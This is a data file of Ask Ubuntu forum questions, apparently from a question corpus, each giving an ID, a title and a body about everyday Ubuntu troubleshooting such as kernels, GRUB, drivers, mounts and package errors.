233380	how do i downgrade kernel on 12.10 ?	i did a fresh installation of ubuntun 12.10 ( kernel v3.5.0.21-generic , 64 bit , us english ) on my computer after downloading the iso from ubuntu.com . in order for one of my installed programs to work , i would like to downgrade the current kernel version to 3.2.0.24-generic questions : is it advisable to downgrade the current kernet version to an older one ? if the answer to ( 1 ) above is yes , how do i do it ? as always , detailed instructions on how to issue specific commands at the terminal window are welcome . i am new to linux and ubuntu . thanks in advance for your help .
233382	install ttf fonts in xorg	i need to install some truetype fonts on my system , in order to make them available to some old style app ( tgif ) . i created a new dir in /usr/share/fonts/truetype/mynewfont , copied my ttf files inside , ran mkfontdir and mkfontscale , ran xset fp rehash and fc-cache -fv , but still the new font is not showing up in xlsfonts . what else can i do ? thanks
233384	accidentally deleted ubuntu partition . now grub rescue	i am in desperate need of assistance . i originally had two partitions on my hard drive ( one for windows 8 and one for ubuntu ) . i deleted the ubuntu partition and used a third party software to merge the unallocated space with my c drive . now whenever i boot , i get this : error : unknown filesystem . grub rescue > any assistance would be appreciated . i would also love it if you used layman 's terms . i know about computers , but i 'm only in the second year of my cns degree .
233386	how can i view youtube videos in tor browser ?	for some reason i 'm unable to view videos on youtube when using the tor browser . what steps do i have to take to view them ?
233387	how do i use the 'scientific ' mode in the calculator ?	i am trying configure the calculator to do some binary to hexadecimal conversions but i ca n't seem to get to scientific mode . please can someone tell me how i configure ?
233389	how can i fix errors relating to the launch of the software center ?	my ubuntu software center is will not launch . i have read several related question and i have tried various suggestions from ask ubuntu including this question , but all attempts return the same error messages . i am running ubuntu 12.04. sudo apt-get install -- reinstall software-center sudo apt-get update & & sudo apt-get upgrade sudo apt-get install -- reinstall python-pkg-resources all attempts provide the following errors : errors were encountered while processing : /var/cache/apt/archives/python-problem-report_2.0.1-0ubuntu15.1_all.deb /var/cache/apt/archives/python-apport_2.0.1-0ubuntu15.1_all.deb /var/cache/apt/archives/apport_2.0.1-0ubuntu15.1_all.deb /var/cache/apt/archives/python-aptdaemon.gtk3widgets_0.43+bzr805-0ubuntu7_all.deb /var/cache/apt/archives/python-aptdaemon.pkcompat_0.43+bzr805-0ubuntu7_all.deb /var/cache/apt/archives/python-aptdaemon_0.43+bzr805-0ubuntu7_all.deb /var/cache/apt/archives/software-center_5.2.6_all.deb how do i correct these errors and get my system functioning properly ? in response to lucio 's comment : running the following two lines of code produced the same errors . sudo apt-get clean sudo apt-get update & & sudo apt-get upgrade continuing with the help file , i ran : sudo dpkg -- configure -a and received the following errors : errors were encountered while processing : python-pkg-resources python-aptdaemon python-aptdaemon.pkcompat apport-gtk software-center python-aptdaemon.gtk3widgets gedit-plugins python-problem-report aptdaemon update-notifier-common python-apport flashplugin-installer apport finally , i ran : sudo apt-get -f install but this , again , provided the original errors . i was installing python 3.3 to use as the default vice python2.7 . is any of this ( from /usr/bin ) creating my problem ? *-rwxr-xr-x 1 root root 4124 apr 17 2012 pyclean *-rwxr-xr-x 1 root root 11933 apr 17 2012 pycompile *lrwxrwxrwx 1 root root 8 aug 14 18:02 pydoc - > pydoc2.7 *-rwxr-xr-x 1 root root 79 aug 1 01:40 pydoc2.7 *lrwxrwxrwx 1 root root 12 aug 14 18:02 pygettext - > pygettext2.7 *-rwxr-xr-x 1 root root 22103 aug 1 01:40 pygettext2.7 *-rwxr-xr-x 1 root root 217 mar 9 2012 pyhtmlizer *lrwxrwxrwx 1 root root 28 dec 24 01:51 python - > /usr/bin/python-3.3.0/python *lrwxrwxrwx 1 root root 9 aug 14 18:02 python2 - > python2.7 *-rwxr-xr-x 1 root root 2989480 aug 1 01:40 python2.7 *drwxr-xr-x 16 inigomontoya inigomontoya 4096 dec 24 01:42 python-3.3.0 *-rw-r -- r -- 1 root root 16327785 sep 29 05:15 python-3.3.0.tgz *lrwxrwxrwx 1 root root 29 aug 14 18:02 pyversions - > ../share/python/pyversions.py
233394	sound is jerky , choppy and distorted in ubuntu 12.10	i am using ubuntu 12.10 and i am getting jerky sound . the sound works perfectly in windows 7 so it is not a hardware issue . i am using a creative sound blaster audigy 2 value sound card with a 5.1 speaker setup . this also does not seem to be a problem with ubuntu as the same thing happened when i tried opensuse 12.2 which i have replaced with ubuntu 12.10 hoping that this will sort out the problem . sound works fine on boot up when i get to the log on screen as i hear the drum , but when i test the speakers after i have logged in , sometimes there is sound and sometimes there is no sound and when testing the speakers i get a jerky , choppy and distorted sound back i have made changes to the following files daemon.conf and default.pa .
233396	openvpn logs `` ip packet with unknown ip version=15 ''	on my openvpn server , i 'm getting messages from openvpn like : ovpn-server [ 2455 ] : host/192.168.129.155:33454 ip packet with unknown ip version=15 seen i have three openvpn clients and each of them give this error every minute . a quick google search makes it sound like this issue happens when one side is not using compression . but , in my setup , both the clients and the server have compression on . some of the clients are 12.04 and some are 12.10 . the server is running 12.10 , but all of the clients give the error . any thoughts on this ?
233406	how to kill applications like on windows ?	i looked it up on google but i did n't find anything helpful . anyway , i was playing crysis 2 ( with playonlinux ) and the game crashed , but i could't kill the process , i tried ctrl+alt+t but nothing but the game appeared on the screen , i had to ctrl+alt+del and finish the session , also losing all my work . on windows there 's the windows key ( which opens the unity panel ) , but i ca n't do anything . and there 's ctrl+alt+del which opens all the processes ( on windows ) but the terminal does n't show up on me ( ctrl+alt+t ) , i ca n't kill any process . any help ?
233412	can i install ubuntu 12.10 on an hp desktop that has uefi	i just bought a new computer and it has windows 8 but i do n't like windows 8 and wanted to use ubuntu 12.10 and am wondering if this is possible to do because of uefi . it is an hp pavilion p6-2376 .
233415	how to get internal hard disk working in lubuntu ?	previously , i had in this windows installed on this computer , but then i installed lubuntu . there are two hdds in this computer , and i installed lubuntu in the other , which i had split into two partitions . the partitions which did n't have lubuntu , were formated as ntfs and had some videos on other stuff and they did work properly in lubuntu . now i have formatted those partitions with ext4 , and now when i start my computer , there are two errors : an error occurred while mounting /media/sdb1 the disk drive for /media/sda5 is not ready yet or not present and i have to press s in both cases . in lubuntu 's file manager , i can see both partitions in the side , but when i try open sb1 , it gives me the error : error mounting : mount exited with exit code 1 ... when i try to watch in media directory , there is n't sda2 , but sda5 . there is also sdb1 and a directory named after sda2 uuid code . also , all file sizes are very small , like 5kb , even tough the hdd are like 120 gb . any help is welcome . it also seems that you always ask for /etc/fstab in this kind of problems , so i put it in the end just in case . # /etc/fstab : static file system information . # # use 'blkid ' to print the universally unique identifier for a # device ; this may be used with uuid= as a more robust way to name devices # that works even if disks are added and removed . see fstab ( 5 ) . # # < file system > < mount point > < type > < options > < dump > < pass > proc /proc proc nodev , noexec , nosuid 0 0 # / was on /dev/sda1 during installation uuid=cf212a82-6d71-41cf-bd15-6bfe659ed943 / ext4 defaults 0 1 # swap was on /dev/sda3 during installation uuid=ccadac6d-83c4-4d68-b5e0-28b6f1533100 none swap sw 0 0 /dev/fd0 /media/floppy0 auto rw , user , noauto , exec , utf8 0 0 /dev/sdb1 /media/sdb1 ntfs nls=iso8859-1 , ro , umask=000 0 0 /dev/sda5 /media/sda5 ntfs nls=iso8859-1 , ro , umask=000 0 0 /dev/sdc1 /media/sdc1 ntfs defaults 0 0
233416	can someone help me with the canon mp250 printer driver ?	is there a way to install a driver for the canon mp250 driver in ubuntu 12.10 . i checked the canon site and there is no driver but i am seeing if in ubuntu that i can get a driver from typing something in terminal or if there is another way to do it .
233420	just installed ubuntu 12.10 alongside windows 7 and after reboot i just get a grub prompt	please help me fix this ! i ca n't either use ubuntu nor windows . i have to use my smartphone to ask this question . i 've just installed ubuntu . i chose the simple way : the partition the installer chose by default . after removing the installation dvd and rebooting , grub seems to be loqded , but there is no menu to choose the os . there is just a grub > prompt with an introductory text above saying : '' minimal bash-like line editing is supported . for the first word , tab lists ... . '' . i 'm not usee to linux so i do n't know what to do to get everything working now . any help would be most welcome .
233423	the latest kernel update broke my macbook air ; how can i fix it ?	i installed 12.10 on my 11-inch mid-'11 air without a hitch . i removed unity and installed cinnamon in its place . i purged every unity-related package from the system . today , the kernel updated and broke my machine . i ca n't get to the grub menu and i am told that the computer is running in low-graphics mode , even though i ca n't do anything with the options presented by the dialogues . nmcli refuses to connect to my network . i need a way to get the system working again , preferably without using a reinstall or install disk . lspci -nn | grep vga produces : 00:02.0 vga compatible controller [ 0300 ] : intel corp. 2nd gen . core processor family integrated graphics controller [ 8086:0116 ] ( rev 09 ) x log a happy update ! turns out my problem was i never ran update-grub . so right now , i 'm rebooting with unity installed again to see if it makes a difference . a happier update the problem now seems to lie with the new kernel . it wo n't recognize my wireless card . but this problem can be considered closed , methinks .
233426	how to access a file belonging to some other group ?	i saw this problem in an online hacking competition . the question asked us to print the contents of the file `` secret '' bruce @ ip-10-144-4-86 : /home/hacker-weekly $ ll total 20 drwxr-xr-x 2 hacker-weekly hacker-weekly 4096 nov 12 19:19 ./ drwxr-xr-x 222 root root 12288 dec 27 06:27 ../ -r -- r -- -- - 1 root secret 373 nov 12 19:19 secret bruce @ ip-10-144-4-86 : /home/hacker-weekly $ stat secret file : `secret' size : 373 blocks : 8 io block : 4096 regular file device : ca01h/51713d inode : 141569 links : 1 access : ( 0440/-r -- r -- -- - ) uid : ( 0/ root ) gid : ( 1004/ secret ) access : 2012-11-24 13:14:40.942961879 +0000 modify : 2012-11-12 19:19:51.079654457 +0000 change : 2012-11-12 19:19:51.079654344 +0000 birth : - bruce @ ip-10-144-4-86 : /home/hacker-weekly $ getent group secret secret : x:1004 : guest bruce @ ip-10-144-4-86 : /home/hacker-weekly $ cat /etc/issue ubuntu 12.04.1 lts \n \l bruce @ ip-10-144-4-86 : /home/hacker-weekly $ groups bruce bruce @ ip-10-144-4-86 : /home $ netstat -tulen active internet connections ( only servers ) proto recv-q send-q local address foreign address state user inode tcp 0 0 0.0.0.0:22 0.0.0.0 : * listen 0 7287 tcp6 0 0 : ::22 : : : * listen 0 7289 udp 0 0 0.0.0.0:68 0.0.0.0 : * 0 6522 ps - i can gather other information also if you tell me what command to run on shell
233429	is this considered a minor kernel update from 3.2.0-24.38 to 3.2.0-35.40 ?	i am thinking of installing ubuntu 12.04.1 lts , 64 bit , english . it comes with a kernel version 3.2.0-35.40 one of my programs only support kernel version 3.2.0-24-generic . on http : //packages.ubuntu.com , there is only one kernel version closest to it , which is 3.2.0-24.38 . question : should i stay with 3.2.0-35.40 or downgrade it to 3.2.0-24.38 ? p.s . : i am new to linux and ubuntu ; hence detailed clarifications would be most welcome .
233430	how come many of the appshowdown apps are n't available in ubuntu anymore ?	after upgrading to 12.10 i 've noticed that i ca n't install some of the nice apps created for the appshowdown , such as : cuttlefish blubphone ( lightread also came out quite late in 12.10 ) it seems such a waste having these great new apps added to the repository , only to exclude them in the first next version . i 'm wondering why are n't these apps automatically available in a newer version of ubuntu . is it simply that the api is so different that it requires major rewrites and programmer activity or is it some bureaucratic reason ? are there any plans to improve this process ?
233432	why is the latexdraw logo so big in xfce 4.10 ?	is there a bug in xfce desktop ? namely , i can see some weird `` xd '' -letters when i try to open latexdraw . letters seem to be much bigger than the normal logo . it does not affect my mouse . i 'm using xfce 4.10 , ubuntu 12.10 and latexdraw version 2.0.8 , build 20100314 . here is a screenshot :
233437	how can i import my old os on virtualbox ?	i used to work with a virtual machine on which i installed ubuntu ( and my host is apple os x ) . but my mac 's hard-drive crashed . i managed to retrive the .vdi file on my virtualbox app folder . how can i install it again ?
233438	dmesg - how to make boot sequence faster	my system used to boot pretty fast when i first installed ubuntu almost one year ago , but now takes a lot more . i used dmesg to see if i could find anything and there seems to be a 35 second gap between entries , but i do n't know what i 'm supposed to do to fix that . part of my dmesg output is here : [ 1.940788 ] registered led device : mmc0 : : [ 1.970100 ] mmc0 : sdhci controller on pci [ 0000:05:00.1 ] using dma [ 1.970152 ] sdhci-pci 0000:05:00.2 : sdhci controller found [ 197b:2391 ] ( rev 90 ) [ 1.970181 ] sdhci-pci 0000:05:00.2 : refusing to bind to secondary interface . [ 2.003943 ] usb 2-1.6 : new usb device found , idvendor=5986 , idproduct=0315 [ 2.003953 ] usb 2-1.6 : new usb device strings : mfr=2 , product=3 , serialnumber=0 [ 2.003959 ] usb 2-1.6 : product : bisoncam , nb pro [ 2.003964 ] usb 2-1.6 : manufacturer : bison corporation [ 2.673778 ] ext3-fs ( loop0 ) : recovery required on readonly filesystem [ 2.673781 ] ext3-fs ( loop0 ) : write access will be enabled during recovery [ 9.178331 ] kjournald starting . commit interval 5 seconds [ 9.214017 ] ext3-fs ( loop0 ) : recovery complete [ 9.214020 ] ext3-fs ( loop0 ) : mounted filesystem with ordered data mode [ 44.393685 ] adding 262140k swap on /host/ubuntu/disks/swap.disk . priority : -1 extents:1 across:262140k [ 44.412667 ] ipv6 : addrconf ( netdev_up ) : eth0 : link is not ready [ 44.441301 ] ext3-fs ( loop0 ) : warning : maximal mount count reached , running e2fsck is recommended [ 44.484151 ] ext3-fs ( loop0 ) : using internal journal [ 44.518587 ] udevd [ 509 ] : starting version 175 and i also have posted the complete file here how can i make my boot sequence faster ? -- -- -- -- -- edit -- -- -- i also have installed bootchart the image output is here : http : //anpel.dimiourgiasite.gr/ubuntu-quantal.png and the log files that come with it are here : http : //anpel.dimiourgiasite.gr/ubuntu-quantal.tgz please note that my machine dual boots ( it always has , even when it did boot quickly ) and that i have installed ubuntu using the windows ubuntu installer .
233439	recent notebooks incompatible with ubuntu ?	i 'm thinking about purchasing a laptop . since without linux it would be for me a worthless object , let me ask the following : are there recent note- or ultrabooks that can not support ubuntu 12.10 installation ? are there notebooks that work considerably below the features they promise when one uses ubuntu ? ( i post this question because i saw this post and fear not to buy a right product ) .
233441	why does n't mplayer work with vdpau ?	i 'm trying to play a hd video file , the command to play the video is : mplayer -vo vdpau -vc ffh264vdpau and the error i get is : [ mkv ] track id 1 : video ( v_mpeg4/iso/avc ) , -vid 0 [ mkv ] track id 2 : audio ( a_ac3 ) , -aid 0 , -alang und [ mkv ] will play video track 1 . detected file format : matroska video : [ avc1 ] 1280x720 24bpp 23.976 fps 0.0 kbps ( 0.0 kbyte/s ) load subtitles in . sub : could not determine file format [ vdpau ] error when calling vdp_device_create_x11 : 1 error opening/initializing the selected video_out ( -vo ) device . ========================================================================== opening audio decoder : [ ffmpeg ] ffmpeg/libavcodec audio decoders audio : 48000 hz , 2 ch , s16le , 384.0 kbit/25.00 % ( ratio : 48000- > 192000 ) selected audio codec : [ ffac3 ] afm : ffmpeg ( ffmpeg ac-3 ) ========================================================================== [ ao oss ] audio_setup : ca n't open audio device /dev/dsp : no such file or directory ao : [ alsa ] 48000hz 2ch s16le ( 2 bytes per sample ) video : no video this is my information : my os : $ cat /etc/lsb-release distrib_id=ubuntu distrib_release=12.04 distrib_codename=precise distrib_description= '' ubuntu precise ( development branch ) '' kernel : $ uname -a linux 3.2.0-35-generic # 55-ubuntu smp wed dec 5 17:45:18 utc 2012 i686 i686 i386 gnu/linux gpu : $ lspci | grep `` vga '' 01:00.0 vga compatible controller : nvidia corporation nv44a [ geforce 6200 ] ( rev a1 ) driver : $ glxinfo | grep opengl opengl vendor string : nvidia corporation opengl renderer string : geforce 6200/agp/sse2 opengl version string : 2.1.2 nvidia 295.40 opengl shading language version string : 1.20 nvidia via cg compiler vainfo : # vainfo libva : va-api version 0.32.0 xlib : extension `` xfree86-dri '' missing on display `` :0 '' . libva : va_getdrivername ( ) returns 0 libva : trying to open /usr/lib/dri/nvidia_drv_video.so libva : va_opendriver ( ) returns -1 vainitialize failed with error code -1 ( unknown libva error ) , exit how can i fix my problem ?
233442	hp 4770s ralink 3290 wireless not working on 12.10	i have installed 12.10 on hp probook 4740s but i cant get wireless ( wifi ) working . after booting to ubuntu , wireless network is by default down and even when i switch it up , it is not visible in network options in top right corner . it is also not possile to connect from terminal , because no wireless networks are found . so it seems that wireless is somehow installed but probably not properly . do ou have any advise pls ? when i run lspci -v i get : 04:00.0 network controller : ralink corp. device 3290 subsystem : hewlett-packard company device 18ec flags : bus master , fast devsel , latency 0 , irq 19 memory at d0610000 ( 32-bit , non-prefetchable ) [ size=64k ] capabilities : [ 40 ] power management version 3 capabilities : [ 50 ] msi : enable- count=1/32 maskable- 64bit+ capabilities : [ 70 ] express endpoint , msi 00 capabilities : [ 100 ] advanced error reporting capabilities : [ 140 ] device serial number 00-00-fd-c3-92-23-94-68 kernel driver in use : rt2860 kernel modules : rt3290sta lshw -c network : *-network description : network controller product : ralink corp. vendor : ralink corp. physical id : 0 bus info : pci @ 0000:04:00.0 version : 00 width : 32 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list configuration : driver=rt2860 latency=0 resources : irq:19 memory : d0610000-d061ffff iwconfig : ra0 ralink sta essid : '' '' nickname : '' rt3290sta '' mode : auto frequency=2.412 ghz bit rate:1 mb/s rts thr : off fragment thr : off encryption key : off link quality=10/100 signal level:0 dbm noise level:0 dbm rx invalid nwid:0 rx invalid crypt:0 rx invalid frag:0 tx excessive retries:0 invalid misc:0 missed beacon:0
233443	how to make banshee/other players recognize a folder as a music player for seamless music synchronization ?	i use webupd8 's go-mtpfs to mount nexus 4 on ubuntu 12.10 . it mounts the folder in home directory . i use banshee to manage my music and playlists . banshee ca n't recognize the mounted folder as a music player and hence i ca n't sync my music . is there a way that i can link or mount nexus 4 in a way for it be recognized by banshee as a music player for seamless music synchronization ? banshee foldersync is broken and does n't support smart playlists , so , that is a no go . http : //www.webupd8.org/2012/12/how-to-mount-android-40-ubuntu-go-mtpfs.html
233444	why am i unable to edit a file on a windows share ( cifs ) ?	i am mounting a windows network drive to my ubuntu machine and i am getting write permission errors when trying to edit a file . sudo mount -t cifs gives me //mediaserver/a on /home/anon/media/overflow/a type cifs ( rw , noexec , nosuid , nodev ) and my fstab line is : //mediaserver/a /home/anon/media/overflow/a cifs username=username , password=password , mode=0777 , dir_mode=07‌​77 0 0
233448	unable to access the internet when installed within vmware player	after a lot of troubleshooting i am still unable to get internet working on ubuntu 12.04 installed on my vmware player . i tried commenting out dns=dnsmasq . ifconfig returns : eth0 and lo with the ipaddress and other information . i do n't know what is wrong . anyone could help me or any other commands or files i should change ?
233462	failing to upgrade udev on 12.04 armhf ( beagleboard )	i have just tried an usual update+upgrade today on my beagleboard and it fails as below : cprov @ beagle-one : /var/lib/dpkg $ sudo apt-get upgrade reading package lists ... done building dependency tree reading state information ... done the following packages will be upgraded : udev 1 upgraded , 0 newly installed , 0 to remove and 0 not upgraded . 1 not fully installed or removed . need to get 0 b/292 kb of archives . after this operation , 0 b of additional disk space will be used . do you want to continue [ y/n ] ? ( reading database ... 15481 files and directories currently installed . ) preparing to replace udev 175-0ubuntu9.1 ( using ... /udev_175-0ubuntu9.2_armhf.deb ) ... dpkg-divert : error : parsing file '/var/lib/dpkg/status ' near line 24 package 'tcpd ' : configured-version for package with inappropriate status dpkg-divert : error : parsing file '/var/lib/dpkg/status ' near line 24 package 'tcpd ' : configured-version for package with inappropriate status dpkg : error processing /var/cache/apt/archives/udev_175-0ubuntu9.2_armhf.deb ( -- unpack ) : subprocess new pre-installation script returned error exit status 2 dpkg-divert : error : parsing file '/var/lib/dpkg/status ' near line 24 package 'tcpd ' : configured-version for package with inappropriate status dpkg : error while cleaning up : subprocess new post-removal script returned error exit status 2 errors were encountered while processing : /var/cache/apt/archives/udev_175-0ubuntu9.2_armhf.deb e : sub-process /usr/bin/dpkg returned an error code ( 1 ) it looks like the dpkg status file contains an invalid status for udev ( all the other files upgraded went through via apt-get -f install ) . here is the relevant part of the udev stanza : package : udev status : install reinstreq half-installed multi-arch : foreign priority : important section : admin installed-size : 839 maintainer : ubuntu developers < ubuntu-devel-discuss @ lists.ubuntu.com > architecture : armhf version : 175-0ubuntu9.1 config-version : 175-0ubuntu9.1 mangling the status to 'install ok installed ' did not work . has anyone experienced the same problem ? any other suggestion for fixing this problem ? thanks in advance .
233464	how to get telnet to localhost working ?	i 'm working on a local dev setup that requires the use of telnet ( playing with setting up a mud server ) so please no feedback suggesting i use ssh as a more secure alternative . however , though i 've got the telnet daemon up , i am getting this output when i telnet localhost . $ telnet localhost trying 127.0.0.1 ... connected to localhost . escape character is '^ ] ' . connection closed by foreign host . what are some reasons that the connection is closed ? i have checked the docs on hosts.allow and hosts.deny , and have decided to not put any entries in either as the default is to allow all and that is sufficient for my local dev purposes .
233471	ubuntu 12.10 not mounting internal hard drives	hi i am a noob and i have no idea what i am doing . i just started using ubuntu 12.10 and i do like the interface very much . i am not savy with the hip lingo of linux , so spare me the who i know what i am talking about . i need help , i need to figure out why both of my hard drives wo n't `` mount '' . i had an extra drive that i was n't using , and i formatted it in windows , and then tried to do a clean install of ubuntu on it and it went fine , but it said my hdd was n't mounted . then i had installed ubuntu on my other hdd alongside windows vista , and i had no problems accessing my hdd space and viewing folders and what not . so i thought that the other hdd had something wrong with it and went ahead and did a clean install of ubuntu 12.10 on it instead and now i am in the same boat again . so i need to figure out how to mount my hdd in ubuntu so i can put files on it . i want to use this system as my primary system for work , it will suit me perfect . please
233474	kdialog -- password used with sudo ?	i am using kdialog for a small utility in making , now i run into this promblem . there is one or more commbined functions that take sudo 3 or 4 times in a row . so its really annoying to have to enter it that many times . i would like to use kdialog -- password to store my sudo password every time i open the app it would store in a variable . this way its not sitting in a file or something . any way , i can see that it stores just find i can echo $ passwrd . but i have no clue how to have it input into the terminal when it askes for it . is this possible ? if so how , even if a diffrent approch . if not what is the actual use of kdialog -- password ? if you cant do this is see very little use for it really . thank you .
233476	why does n't `` whereis '' locate a file ?	i was looking for a specific file using whereis from the command line . i got a rather useless result , but i then found the exact file i was looking for by manually searching . i did not make a mistake in the command line . why did n't whereis turn up all my files ? is there another method ?
233477	is there a fast or minimal installation option for wubi ?	i have recently installed ubuntu on my windows machine using the ~2.8 mb windows installer . the installer then downloaded the necessary stuffs to complete the setup . this process took around 2 hours on a 5 mbps download speed . on reviewing the initial installation , i have noticed that a lot of applications are installed , some of which i may or may not use . my point is , is there a way to setup ubuntu , so that the minimal amount of applications will be installed , and thus speed up the setup process by reducing the downloaded content .
233480	how do i get my volume keys working ?	my laptop 's media keys ( volume up/down/mute ) are detected via xev and showkey . i can go into system settings > keyboard > shortcuts and set the volume controls with the media keys . however when i try to use the keys they do not function properly . i tried setting the keys and rebooting the system but that has n't worked . any ideas ? system info : dell latitude e6500 ubuntu 12.04.1
233483	python dependencies in debian packages	i created my first debian package today by following the accepted answer at this askubuntu question . everything went fine , and it installed properly afterwards . however , my script is written in python and depends on the beautifulsoup library . my plan is to send the package to a friend who i am nearly certain does not have pip or the like installed . what is the best way to attach such a dependency to my package or ensure that it is installed along with the package ?
233484	where is the kernel directory for ubuntu 12.10 ?	i need to run the following instructions : run build.sh as follows from a terminal window , where /path/to/expanded/folder is where build.sh is located , i.e . /home/user/desktop/ap-kernelmodule-1.0.14-13 : cd /path/to/expanded/folder sudo ./build.sh -- kernel-dir /lib/modules/ $ ( uname -r ) /build in my case , âthe path to expanded folderâ is home/sharon/savfl/ap-kernelmodule-1.0.14-13 now , as for the kernel directory , i tried searching within almost all directories and managed to find the nearest match whose path is : /usr/src/linux-headers-3.5.0.21-generic/kernel so , i issued the following command : sharon @ sharon : ~/savfl/ap-kernelmodule-1.0.14-13 $ sudo ./build.sh home/sharon/usr/src/linux-headers-3.5.0.21-generic/kernel /lib/modules/3.5.0.21-generic/build [ sudo ] password for sharon : and i got the following error message : unknown option : home/sharon/usr/src/linux-headers-3.5.0.21-generic/kernel usage : build.sh [ options ] options : -- kernel-dir [ directory ] : directory is to set kernel headers/makefiles directory to build kernel modules the default is /usr/src/kernels/3.5.0-21-generic-x86_64 -- kernel-rel [ release ] : release is to set which kernel release the kernel modules are builded for the default is the current kernel release ( 3.5.0-21-generic ) -- debug : build the kernel modules with debugging information -- clean : delete all generated files -- version : display the version number of the build script -- help : display this help can someone help me with this please ? please note that prior to doing the above i have installed the linux-headers relevant to my current kernel version with the following command : sudo apt-get install linux-headers-3.5.0.21-generic build-essential i am new to linux and ubuntu ; hence detailed how-to instructions would be most welcome . thanks in advance . instruction source : http : //www.symantec.com/business/support/index ? page=content & id=tech95496
233496	how do i use a text-only interface to log in ?	i am running ubuntu 12.10 . when my computer boots , i want to log into my computer only using the cli , not the default gui given by ubuntu , and use the cli to choose a window manager after i log in . i am aware of ctrl+alt+f* , but that is one more keypress - unless i can default to one of those . how would i go about disabling the gui login , and playing with the cli log in instead ?
233501	ubuntu on a external hardrive drivers issue	i installed ubuntu 12.04 on an external hard drive and the installation went quit well . i booted into the drive and was able to make all the modifications needed for the external hard drive . i ran into trouble when i booted up the external hard drive on a different machine and then returned back booting up into the original laptop . when booting i get the message that the computer will only operate in low graphics mode . from this point i can only boot back into the os by the terminal command startx . it is obvious that somehow the drivers from the second machine installed on the external hd thereby creating a conflict for the hd being used again on the first machine . is there a solution for this ? can ubuntu on an external drive be adaptable to different machines that it might be used on or shared with ? these questions would be relative to all drivers necessary for the operating system to work well ( i.e . wireless drivers )
233509	how do i setup freelan in ubuntu ?	i can not find any tutorials online taking me from installation to connecting to the client within ubuntu . are there any tutorials i am missing or does anyone know how to setup freelan ?
233510	how to fix video playback showing green screen with just audio ?	when i attempt to view a video file , i get a solid green screen with audio , regardless of the application or file format . this happens with .mp4 , .gp , and .dv files . i am unable to use live web cam with skype , also getting a solid green screen . i am using 32-bit ubuntu 12.04 on an imac . there is no problem viewing videos on the internet , i.e . youtube , etc. , and the files i upload to youtube play normally . i only have problems viewing local files . i do not use vlc media player . how do i go about changing the hardware acceleration ?
233511	why does my ubuntu 12.10 not look like examples in ask ubuntu ?	what front-end/theme/etc . is shown on how do i install skype ? i am a rank novice and installed ubuntu from the web ( forgot the site ) . it runs fine , but examples i find in various support forums do n't look like my screens .
233514	do i have ubuntu 64-bit ?	i installed ubuntu on a lenovo x61 laptop . i assumed that would be a 32-bit version of the software . how can i tell if it is 32- or 64-bit ? thanks , larry mehl
233520	how can i export a previous installation under wine to the playonlinux folder ?	i have some programs and games installed with wine and i wonder if it 's possible manage this applications with playonlinux . there was a plugin called `` wine import '' to do this , but seems to be obsolete . what can i do ? should i copy my wine folder and paste it in the playonlinux directory ?
233528	how to fix 404 error installing updates ?	i am not able to install any software on my ubuntu 12.04 lts system . here is the output of sudo apt-get update ign http : //dl.google.com stable inrelease ign http : //dl.google.com stable inrelease hit http : //dl.google.com stable release.gpg ign http : //archive.canonical.com precise inrelease ign http : //ppa.launchpad.net precise inrelease ign http : //ppa.launchpad.net precise inrelease ign http : //ppa.launchpad.net precise inrelease hit http : //dl.google.com stable release.gpg hit http : //archive.canonical.com precise release.gpg hit http : //dl.google.com stable release hit http : //dl.google.com stable release ign http : //ppa.launchpad.net precise inrelease ign http : //ppa.launchpad.net precise inrelease ign http : //ppa.launchpad.net precise release.gpg hit http : //archive.canonical.com precise release hit http : //dl.google.com stable/main amd64 packages hit http : //dl.google.com stable/main i386 packages ign http : //archive.ubuntu.com precise inrelease ign http : //archive.ubuntu.com precise-updates inrelease ign http : //archive.ubuntu.com precise-backports inrelease ign http : //security.ubuntu.com precise-security inrelease ign http : //dl.google.com stable/main translationindex hit http : //ppa.launchpad.net precise release.gpg hit http : //ppa.launchpad.net precise release.gpg hit http : //ppa.launchpad.net precise release.gpg hit http : //archive.canonical.com precise/partner amd64 packages hit http : //dl.google.com stable/main amd64 packages ign http : //extras.ubuntu.com precise inrelease hit http : //dl.google.com stable/main i386 packages hit http : //archive.ubuntu.com precise release.gpg hit http : //archive.ubuntu.com precise-updates release.gpg ign http : //dl.google.com stable/main translationindex hit http : //security.ubuntu.com precise-security release.gpg hit http : //archive.canonical.com precise/partner i386 packages ign http : //archive.canonical.com precise/partner translationindex hit http : //ppa.launchpad.net precise release.gpg hit http : //extras.ubuntu.com precise release.gpg hit http : //archive.ubuntu.com precise-backports release.gpg hit http : //archive.ubuntu.com precise release hit http : //security.ubuntu.com precise-security release ign http : //ppa.launchpad.net precise release hit http : //ppa.launchpad.net precise release hit http : //ppa.launchpad.net precise release hit http : //archive.ubuntu.com precise-updates release hit http : //archive.ubuntu.com precise-backports release hit http : //extras.ubuntu.com precise release hit http : //ppa.launchpad.net precise release hit http : //security.ubuntu.com precise-security/main amd64 packages hit http : //archive.ubuntu.com precise/main amd64 packages hit http : //archive.ubuntu.com precise/restricted amd64 packages hit http : //archive.ubuntu.com precise/universe amd64 packages hit http : //archive.ubuntu.com precise/multiverse amd64 packages hit http : //archive.ubuntu.com precise/main i386 packages hit http : //archive.ubuntu.com precise/restricted i386 packages hit http : //archive.ubuntu.com precise/universe i386 packages hit http : //ppa.launchpad.net precise release ign http : //ppa.launchpad.net precise/main translationindex hit http : //security.ubuntu.com precise-security/restricted amd64 packages hit http : //security.ubuntu.com precise-security/universe amd64 packages hit http : //security.ubuntu.com precise-security/multiverse amd64 packages hit http : //security.ubuntu.com precise-security/main i386 packages hit http : //security.ubuntu.com precise-security/restricted i386 packages hit http : //security.ubuntu.com precise-security/universe i386 packages hit http : //security.ubuntu.com precise-security/multiverse i386 packages hit http : //security.ubuntu.com precise-security/main translationindex hit http : //security.ubuntu.com precise-security/multiverse translationindex hit http : //security.ubuntu.com precise-security/restricted translationindex hit http : //extras.ubuntu.com precise/main amd64 packages hit http : //archive.ubuntu.com precise/multiverse i386 packages hit http : //archive.ubuntu.com precise/main translationindex hit http : //archive.ubuntu.com precise/multiverse translationindex hit http : //archive.ubuntu.com precise/restricted translationindex hit http : //archive.ubuntu.com precise/universe translationindex hit http : //archive.ubuntu.com precise-updates/main amd64 packages hit http : //archive.ubuntu.com precise-updates/restricted amd64 packages hit http : //archive.ubuntu.com precise-updates/universe amd64 packages hit http : //ppa.launchpad.net precise/main sources hit http : //ppa.launchpad.net precise/main amd64 packages hit http : //ppa.launchpad.net precise/main i386 packages ign http : //ppa.launchpad.net precise/main translationindex hit http : //ppa.launchpad.net precise/main sources hit http : 